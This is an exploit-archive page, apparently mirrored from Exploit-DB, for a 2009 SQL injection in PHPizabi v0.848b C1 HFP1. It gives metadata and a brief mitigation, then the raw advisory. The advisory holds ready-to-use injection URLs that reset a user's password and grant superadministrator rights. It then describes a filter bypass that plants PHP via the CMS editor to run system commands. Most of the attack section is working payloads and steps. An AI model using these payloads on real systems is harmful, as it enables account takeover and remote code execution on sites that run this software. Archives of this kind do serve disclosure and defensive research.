header-logo
Suggest Exploit
vendor:
PHPizabi
by:
Nine:Situations:Group::bookoo
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHPizabi
Affected Version From: v0.848b C1 HFP1
Affected Version To: v0.848b C1 HFP1
Patch Exists: NO
Related CWE: N/A
CPE: a:phpizabi:phpizabi:0.848b_c1_hfp1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)

A SQL injection vulnerability exists in the /theme/default/proc.inc.php file of PHPizabi v0.848b C1 HFP1. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to an authenticated user. This URL contains a malicious SQL query which can be used to change the username and password of an existing user, grant the attacker admin rights, and execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

--------------------------------------------------------------------------------
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo
--------------------------------------------------------------------------------
our site: http://retrogod.altervista.org/
software site: http://www.phpizabi.net/
--------------------------------------------------------------------------------

vulnerability:
sql injection in /theme/default/proc.inc.php

<?php

	function bufferProcParse($buffer) {
		global $CONF;
		
		$tpl = new template;
		$tpl -> LoadThis($buffer);
		// HANDLE POSTED NOTEPAD DATA ///////////////////////////////////////////////////////
		if (isset($_GET["notepad_body"])) {
			myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
			me("flush");
		}
...

note urldecode() ...

exploitation, manual:

injection urls:

change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%

2527/*

grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*
which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%

20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index

boom !

now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file}

use this opening and closing tag style, example:

<script language="php">
system("ls -la");
</script>

(it is always availiable, see:http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php :

...
	if (isset($_POST["Submit"])) {
		if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {
			
			$body =
				"<?php if (!defined(\"CORE_STRAP\")) die(); ?>\n"
				.preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0]))
				."\n<!-- Edited by ".me("username")." on ".date($CONF["LOCALE_HEADER_DATE_TIME"])." -->";
			;
			
			fwrite($handle, $body);
			fclose($handle);
...

which is bypassed.

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_

to see the output...

now visit log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs

...
--------------------------------------------------------------------------------

# milw0rm.com [2009-03-24]

Navigation

Suggest Exploit

Services By CQR